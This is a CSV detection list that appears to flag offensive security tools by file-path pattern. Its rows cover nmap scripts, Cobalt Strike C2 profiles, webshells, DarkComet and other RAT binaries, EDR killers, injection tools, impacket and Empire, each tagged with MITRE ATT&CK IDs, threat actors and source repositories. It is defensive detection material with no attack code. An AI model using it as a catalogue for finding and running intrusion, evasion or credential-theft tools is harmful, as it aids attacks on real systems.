"*/cvs-brute.nse*",".{0,1000}\/cvs\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6381"
"*/cvs-brute-repository.nse*",".{0,1000}\/cvs\-brute\-repository\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6382"
"*/CWoNaJLBo/VTNeWw11212/*",".{0,1000}\/CWoNaJLBo\/VTNeWw11212\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","6383"
"*/CWoNaJLBo/VTNeWw11213/*",".{0,1000}\/CWoNaJLBo\/VTNeWw11213\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","6384"
"*/Cyber Shell (v 1.0).php*",".{0,1000}\/Cyber\sShell\s\(v\s1\.0\)\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6385"
"*/CyberSpy5.Asp*",".{0,1000}\/CyberSpy5\.Asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6386"
"*/d00r_py3.py*",".{0,1000}\/d00r_py3\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6387"
"*/D1rkInject.git*",".{0,1000}\/D1rkInject\.git.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","6388"
"*/D3m0n1z3dShell.git*",".{0,1000}\/D3m0n1z3dShell\.git.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","6389"
"*/D3m0n1z3dShell/archive/*",".{0,1000}\/D3m0n1z3dShell\/archive\/.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","6390"
"*/d4em0n/exrop*",".{0,1000}\/d4em0n\/exrop.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","6391"
"*/daap-get-library.nse*",".{0,1000}\/daap\-get\-library\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6392"
"*/dacledit.py*",".{0,1000}\/dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6393"
"*/dacledit.py*",".{0,1000}\/dacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6394"
"*/daclread.py*",".{0,1000}\/daclread\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6395"
"*/dafthack/MSOLSpray*",".{0,1000}\/dafthack\/MSOLSpray.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","6396"
"*/DAMP.git*",".{0,1000}\/DAMP\.git.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","6398"
"*/Dandelion_RAT.exe*",".{0,1000}\/Dandelion_RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6399"
"*/DanMcInerney/ridenum*",".{0,1000}\/DanMcInerney\/ridenum.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","6400"
"*/daphne.git*",".{0,1000}\/daphne\.git.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","N/A","8","1","17","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z","6401"
"*/daphne-x64*",".{0,1000}\/daphne\-x64.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","N/A","8","1","17","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z","6402"
"*/Dark Comet Stub Crypter.exe*",".{0,1000}\/Dark\sComet\sStub\sCrypter\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6403"
"*/darkarmour.git*",".{0,1000}\/darkarmour\.git.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","6404"
"*/DarkCoderSc.exe*",".{0,1000}\/DarkCoderSc\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6405"
"*/DarkCoderSc/*",".{0,1000}\/DarkCoderSc\/.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","6406"
"*/DarkComet.exe*",".{0,1000}\/DarkComet\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6407"
"*/DarkComet.exe*",".{0,1000}\/DarkComet\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6408"
"*/DarkComet_Full_setup.exe*",".{0,1000}\/DarkComet_Full_setup\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6409"
"*/DarkComet_Module_setup.exe*",".{0,1000}\/DarkComet_Module_setup\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Transparent Tribe - SilverTerrier - APT38 ","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6410"
"*/darkexe.py*",".{0,1000}\/darkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","6411"
"*/darkfire.bat*",".{0,1000}\/darkfire\.bat.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6412"
"*/darkhotel.py*",".{0,1000}\/darkhotel\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","6413"
"*/DarkLoadLibrary.git*",".{0,1000}\/DarkLoadLibrary\.git.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","N/A","10","10","1133","207","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z","6414"
"*/Darkside.exe*",".{0,1000}\/Darkside\.exe.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","6415"
"*/Darkside.git*",".{0,1000}\/Darkside\.git.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","6416"
"*/Darkside.sln*",".{0,1000}\/Darkside\.sln.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","6417"
"*/Dark-Virus.exe*",".{0,1000}\/Dark\-Virus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6418"
"*/Dark-Virus.exe*",".{0,1000}\/Dark\-Virus\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6419"
"*/darkweb2017-top100.txt*",".{0,1000}\/darkweb2017\-top100\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","6420"
"*/DarkWidow.git*",".{0,1000}\/DarkWidow\.git.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","6421"
"*/data/assemblies/SharpPick.exe*",".{0,1000}\/data\/assemblies\/SharpPick\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6422"
"*/data/assemblies/SharpSendEmail.exe*",".{0,1000}\/data\/assemblies\/SharpSendEmail\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6423"
"*/data/assemblies/SharpView.exe*",".{0,1000}\/data\/assemblies\/SharpView\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6424"
"*/data/attacks/*.txt*",".{0,1000}\/data\/attacks\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","6425"
"*/data/auxiliary/gather*",".{0,1000}\/data\/auxiliary\/gather.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6426"
"*/data/dll/mimikatz/mimikatz*",".{0,1000}\/data\/dll\/mimikatz\/mimikatz.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6427"
"*/data/dll/PromptCreds/PromptCreds*",".{0,1000}\/data\/dll\/PromptCreds\/PromptCreds.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6428"
"*/data/empire.db*",".{0,1000}\/data\/empire\.db.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6429"
